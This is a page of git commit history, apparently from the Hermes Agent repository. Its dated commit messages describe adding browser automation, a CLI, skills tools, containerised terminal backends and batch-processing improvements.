teknium1	20f2875472	Implement browser session inactivity timeout and cleanup - Updated `.env.example` to include `BROWSER_INACTIVITY_TIMEOUT` for auto-cleanup of inactive sessions. - Enhanced `cli.py` to load the new inactivity timeout configuration into environment variables. - Added background thread functionality in `browser_tool.py` to periodically clean up inactive browser sessions based on the configured timeout. - Improved session management by tracking last activity timestamps and ensuring cleanup occurs when sessions exceed inactivity limits.	2026-01-31 21:42:15 -08:00
teknium	bc76a032ba	Add a claude code-like CLI - Introduced `cli-config.yaml.example` to provide a template for configuring the CLI behavior, including model settings, terminal tool configurations, agent behavior, and toolsets. - Created `cli.py` for an interactive terminal interface, allowing users to start the Hermes Agent with various options and toolsets. - Added `hermes` launcher script for convenient CLI access. - Updated `model_tools.py` to support quiet mode for suppressing output during tool initialization and execution. - Enhanced logging in various tools to respect quiet mode, improving user experience by reducing unnecessary output. - Added `prompt_toolkit` to `requirements.txt` for improved CLI interaction capabilities. - Created `TODO.md` for future improvements and enhancements to the Hermes Agent framework.	2026-01-31 06:30:48 +00:00
teknium	f172f7d4aa	Add skills tools and enhance model integration - Introduced new skills tools: `skills_categories`, `skills_list`, and `skill_view` in `model_tools.py`, allowing for better organization and access to skill-related functionalities. - Updated `toolsets.py` to include a new `skills` toolset, providing a dedicated space for skill tools. - Enhanced `batch_runner.py` to recognize and validate skills tools during batch processing. - Added comprehensive tool definitions for skills tools, ensuring compatibility with OpenAI's expected format. - Created new shell script `test_skills_kimi.sh` for testing skills tool functionality with Kimi K2.5. - Added example skill files demonstrating the structure and usage of skills within the Hermes-Agent framework, including `SKILL.md` for example and audiocraft skills. - Improved documentation for skills tools and their integration into the existing tool framework, ensuring clarity for future development and usage.	2026-01-30 07:39:55 +00:00
teknium	771cf41fea	Update environment configuration and enhance terminal tool integration - Modified `.env.example` to set the default terminal environment to 'singularity' and updated Docker and Singularity image references for better compatibility. - Enhanced `run_mixed_tasks.sh` and `run_terminal_tasks.sh` scripts to utilize the new Singularity setup, including improved logging and cache directory management. - Introduced functionality in `terminal_tool.py` to automatically build and cache SIF images from Docker URLs, streamlining the execution environment setup. - Updated logging messages for clarity on image usage and cache directory paths.	2026-01-29 22:47:11 +00:00
teknium	4c05ef0ba8	Enhance logging and tool initialization for improved performance - Updated logging configuration in `run_agent.py` to suppress debug messages from additional third-party libraries, reducing noise in logs. - Enhanced shell scripts for terminal tasks to utilize Singularity for containerized execution, including pre-build SIF image logic and improved logging. - Refactored tool initialization in `mixture_of_agents_tool.py`, `vision_tools.py`, and `web_tools.py` to implement lazy loading of API clients, optimizing resource usage and error handling. - Updated ephemeral system prompts in shell scripts to provide clearer guidance on task execution and resource usage.	2026-01-29 19:59:59 +00:00
teknium	248acf715e	Add browser automation tools and enhance environment configuration - Introduced new browser automation tools in `browser_tool.py` for navigating, interacting with, and extracting content from web pages using the agent-browser CLI and Browserbase cloud execution. - Updated `.env.example` to include new configuration options for Browserbase API keys and session settings. - Enhanced `model_tools.py` and `toolsets.py` to integrate browser tools into the existing tool framework, ensuring consistent access across toolsets. - Updated `README.md` with setup instructions for browser tools and their usage examples. - Added new test script `test_modal_terminal.py` to validate Modal terminal backend functionality. - Improved `run_agent.py` to support browser tool integration and logging enhancements for better tracking of API responses.	2026-01-29 06:10:24 +00:00
teknium	ba19d530ad	Update environment configuration and enhance terminal tool integration - Updated `.env.example` to include new API keys and configuration options for the mini-swe-agent backend, including support for local, Docker, and Modal environments. - Added `.gitmodules` to include mini-swe-agent as a submodule for easier integration. - Refactored `mini_swe_runner.py` to use the updated model format and default to OpenRouter for API calls. - Enhanced `model_tools.py` to support the new terminal tool definitions and ensure compatibility with the mini-swe-agent backend. - Updated `README.md` to reflect changes in setup instructions and environment variable configurations. - Improved `terminal_tool.py` to manage execution environments and lifecycle, ensuring proper cleanup and error handling. - Introduced `terminal_hecate.py` for executing commands on MorphCloud VMs, providing an alternative backend for terminal operations.	2026-01-23 12:26:53 +00:00
teknium	6eb76c7c1a	Enhance batch processing and image generation tools - Updated batch processing to include robust resume functionality by scanning completed prompts based on content rather than indices, improving recovery from failures. - Implemented retry logic for image downloads with exponential backoff to handle transient failures effectively. - Refined image generation tool to utilize the FLUX 2 Pro model, updating descriptions and parameters for clarity and consistency. - Added new configuration scripts for GLM 4.7 and Imagen tasks, enhancing usability and logging capabilities. - Removed outdated scripts and test files to streamline the codebase.	2026-01-18 10:11:59 +00:00
teknium	13d360030f	Enhance tool normalization and API integration across modules - Introduced normalization functions for tool statistics and error counts to ensure consistent schema across all trajectory entries, facilitating compatibility with HuggingFace datasets. - Updated batch processing to utilize normalized tool stats and error counts, improving data integrity. - Refactored vision tools and mixture of agents tool to integrate with OpenRouter API, replacing Nous Research API references and updating model configurations. - Enabled reasoning capabilities in API calls for enhanced response quality across various tools. - Improved error handling and API key validation for OpenRouter integration.	2026-01-14 13:40:10 +00:00
teknium	4071ba29da	Enhance batch processing and tool validation - Added support for tracking partial results and tool error counts in batch processing. - Implemented filtering of corrupted entries during batch file combination based on valid tool names. - Updated terminal tool to improve command execution and error handling, including retry logic for transient failures. - Refactored model tools to use a simple terminal tool with no session persistence. - Improved logging and error messages for invalid API responses and tool calls. - Introduced chunked processing for large content in web tools to manage size limitations effectively.	2026-01-10 05:56:26 +00:00
Teknium	80d326310e	Merge branch 'main' into speed-upgrades	2026-01-08 01:03:34 -08:00
Teknium	53fc705b13	Merge pull request #8 from NousResearch/update-snapshot-id Update snapshot id for ipython	2026-01-08 01:00:24 -08:00
teknium	6af6ff2a0a	updates for stability and speed	2026-01-08 08:57:51 +00:00
hjc-puro	1614c15bb1	rate limits	2025-11-17 18:35:36 -05:00
hjc-puro	f813959750	add simple terminal	2025-11-17 01:14:31 -05:00
hjc-puro	0fbc0475f3	update snapshot id for ipython	2025-11-05 02:11:25 -05:00
Teknium	4135cf4682	Merge branch 'main' into test	2025-11-04 19:54:40 -08:00
teknium	c82741c3d8	some cleanups	2025-11-05 03:47:17 +00:00
hjc-puro	fbd3a2fdb8	prevent leakage of morph instances between tasks	2025-11-04 03:32:43 -05:00
hjc-puro	a4db3fdee5	fix leakage	2025-11-03 17:42:23 -05:00
hjc-puro	0ca3e0aaa9	update snapshot	2025-11-02 23:13:49 -05:00
hjc-puro	a6ec79730c	terminal tool	2025-11-02 08:57:04 +08:00
hjc-puro	faecbddd9b	fix terminal interactivity	2025-11-02 08:52:05 +08:00
teknium	de9c0edc51	some bugfixes	2025-10-15 18:07:06 +00:00
teknium	8d256779d8	Update vision_tools.py to include image downloading and base64 conversion features. add excluding tmp image dl's in .gitignore	2025-10-08 02:38:04 +00:00
teknium	22b6d5866c	Fix some issues around async and tool constraints	2025-10-07 14:08:46 +00:00
teknium	6fac6fecde	Enhance import handling for Hecate in terminal_tool.py to manage local folder shadowing and improve error reporting for import failures.	2025-10-03 09:46:44 +00:00
teknium	a7ff4d49e9	A bit of restructuring for simplicity and organization	2025-10-01 23:29:25 +00:00
teknium	0411ca1880	Add environment configuration file, restructure tool imports, and enhance README setup instructions	2025-10-01 09:54:17 +00:00

... 15 16 17 18 19 ...

1072 Commits